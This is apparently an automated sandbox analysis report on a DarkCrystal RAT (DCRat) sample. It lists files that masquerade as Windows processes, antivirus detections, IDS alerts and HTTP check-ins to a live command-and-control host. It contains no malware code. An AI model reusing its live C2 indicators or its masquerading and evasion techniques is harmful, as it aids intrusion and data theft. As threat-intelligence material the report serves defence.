Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 4.0.pfwa.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1637515390.0000000000B92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1635034853.0000000004CE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: work.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pfwa.exe PID: 7668, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\twain_32\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Sidebar\RuntimeBroker.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 4.0.pfwa.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1637515390.0000000000B92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1635034853.0000000004CE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: work.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pfwa.exe PID: 7668, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\twain_32\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Sidebar\RuntimeBroker.exe, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
138.201.79.103	parking-exp.regery.net	Germany		24940	HETZNER-ASDE	true

Contacted Domains

Name	IP	Active
parking-exp.regery.net	138.201.79.103	true
opratio.top	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://opratio.top/ProviderpipePythonGeoupdateBigloaddownloads.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Users\user\AppData\Local\Temp\3LXAY36iRv.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\rq9fLK5Nyj.bat	Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\AppData\Local\Temp\ZXPLL9zJFP.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\NqvJKoZOIs.bat	Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Windows\twain_32\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Users\user\AppData\Local\Temp\nBqbaEi3SG.bat	Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\AppData\Local\Temp\Vs6Gb3dzjw.bat	Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\AppData\Local\Temp\diBg3fIzhe.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Users\user\AppData\Local\Temp\g3J0tdP0ue.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\UO0HaVbJ1O.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\v8evR6XBmk.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1309950

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Virustotal: Detection: 62%	Perma Link
Source: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	Virustotal: Detection: 62%	Perma Link
Source: C:\Recovery\QmitaxvEcgoLLOqeIEyLx.exe	ReversingLabs: Detection: 83%
Source: C:\Recovery\QmitaxvEcgoLLOqeIEyLx.exe	Virustotal: Detection: 62%	Perma Link
Source: C:\Users\Public\Music\QmitaxvEcgoLLOqeIEyLx.exe	ReversingLabs: Detection: 83%
Source: C:\Users\Public\Music\QmitaxvEcgoLLOqeIEyLx.exe	Virustotal: Detection: 62%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Virustotal: Detection: 18%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Virustotal: Detection: 62%	Perma Link
Source: C:\Windows\twain_32\WmiPrvSE.exe	ReversingLabs: Detection: 83%
Source: C:\Windows\twain_32\WmiPrvSE.exe	Virustotal: Detection: 62%	Perma Link

Multi AV Scanner detection for submitted file

Source: JAJL2EYBPH.exe	Virustotal: Detection: 70%			Perma Link
Source: JAJL2EYBPH.exe	ReversingLabs: Detection: 57%

Machine Learning detection for dropped file

Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Joe Sandbox ML: detected
Source: C:\Windows\twain_32\WmiPrvSE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	Joe Sandbox ML: detected

Uses 32bit PE files

Source: JAJL2EYBPH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Common Files\Adobe\296c159f5c41a5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Windows Sidebar\9e8d7a4ca61bd9	Jump to behavior

Source: JAJL2EYBPH.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: JAJL2EYBPH.exe, work.exe.0.dr
Source:	Binary string: *m.pdb source: WmiPrvSE.exe, 00000009.00000002.1804469408.000000001BB08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s\dll\System.pdb$ source: WmiPrvSE.exe, 0000001B.00000002.2158498353.000000001B680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdbB- source: WmiPrvSE.exe, 00000020.00000002.2262813857.000000001BE64000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: WmiPrvSE.exe, 0000003A.00000002.2764366926.000000001B66E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dows\dll\System.pdbS-7 source: WmiPrvSE.exe, 00000016.00000002.2034484726.000000001B01C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dows\dll\System.pdb source: WmiPrvSE.exe, 0000001B.00000002.2158498353.000000001B680000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2262813857.000000001BE64000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: (@dows\dll\System.pdb source: WmiPrvSE.exe, 0000002F.00000002.2553710900.000000001B64C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb source: WmiPrvSE.exe, 0000003A.00000002.2764366926.000000001B67C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: runas.pdb source: WmiPrvSE.exe, 0000001B.00000002.2157976799.000000001B620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WmiPrvSE.exe, 0000003A.00000002.2764366926.000000001B66E000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B8BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00B8BA94
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B9D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00B9D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009EBA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	3_2_009EBA94
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009FD420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	3_2_009FD420

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 4x nop then jmp 00007FFD9BACBFCCh		27_2_00007FFD9BACBE8D
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 4x nop then jmp 00007FFD9BADBFCCh		37_2_00007FFD9BADBE8D

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49729 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49736 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49737 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49738 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49741 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49742 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49743 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49744 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49745 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49746 -> 138.201.79.103:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: opratio.topContent-Length: 332Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: opratio.top

Source: unknown

Source: WmiPrvSE.exe, 00000009.00000002.1794790837.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1794790837.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.0000000003797000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002676000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2133894379.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2133894379.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.0000000003391000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.0000000003977000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000025.00000002.2369709829.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000025.00000002.2369709829.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.0000000003B67000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.000000000359A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002F.00000002.2530032666.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002F.00000002.2530032666.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2603792472.0000000003181000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://opratio.top
Source: WmiPrvSE.exe, 0000003F.00000002.2806559544.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://opratio.top/
Source: WmiPrvSE.exe, 00000009.00000002.1794790837.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002676000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2133894379.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.0000000003391000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000025.00000002.2369709829.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.000000000359A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002F.00000002.2530032666.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2603792472.0000000003181000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2603792472.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003A.00000002.2736236455.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003A.00000002.2736236455.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003F.00000002.2806559544.000000000359A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003F.00000002.2806559544.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://opratio.top/ProviderpipePythonGeoupdateBigloaddownloads.php
Source: WmiPrvSE.exe, 00000009.00000002.1794790837.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.0000000003797000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2133894379.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.0000000003977000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000025.00000002.2369709829.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.0000000003B67000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002F.00000002.2530032666.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2603792472.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003A.00000002.2736236455.0000000003397000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003F.00000002.2806559544.0000000003B67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://parking-exp.regery.net
Source: pfwa.exe, 00000004.00000002.1664894690.000000000348F000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1794790837.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002676000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2133894379.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.0000000003391000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000025.00000002.2369709829.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.000000000359A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002F.00000002.2530032666.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2603792472.0000000003181000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2603792472.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003A.00000002.2736236455.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003A.00000002.2736236455.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003F.00000002.2806559544.000000000359A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003F.00000002.2806559544.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Detected VMProtect packer

Source: QmitaxvEcgoLLOqeIEyLx.exe0.4.dr

Static PE information: .vmp0 and .vmp1 section names

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B87AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00B87AAF

Creates files inside the system directory

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Windows\twain_32\WmiPrvSE.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Windows\twain_32\24dbde2999530e			Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B892C6	0_2_00B892C6
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B95011	0_2_00B95011
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA62A8	0_2_00BA62A8
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B95282	0_2_00B95282
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B902F7	0_2_00B902F7
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B98253	0_2_00B98253
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B913FD	0_2_00B913FD
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA64D7	0_2_00BA64D7
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B9742E	0_2_00B9742E
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B955B0	0_2_00B955B0
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BAE600	0_2_00BAE600
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B907A7	0_2_00B907A7
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B988AF	0_2_00B988AF
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B8D833	0_2_00B8D833
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B8395A	0_2_00B8395A
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BAEAAE	0_2_00BAEAAE
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B84A8E	0_2_00B84A8E
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BB2BB4	0_2_00BB2BB4
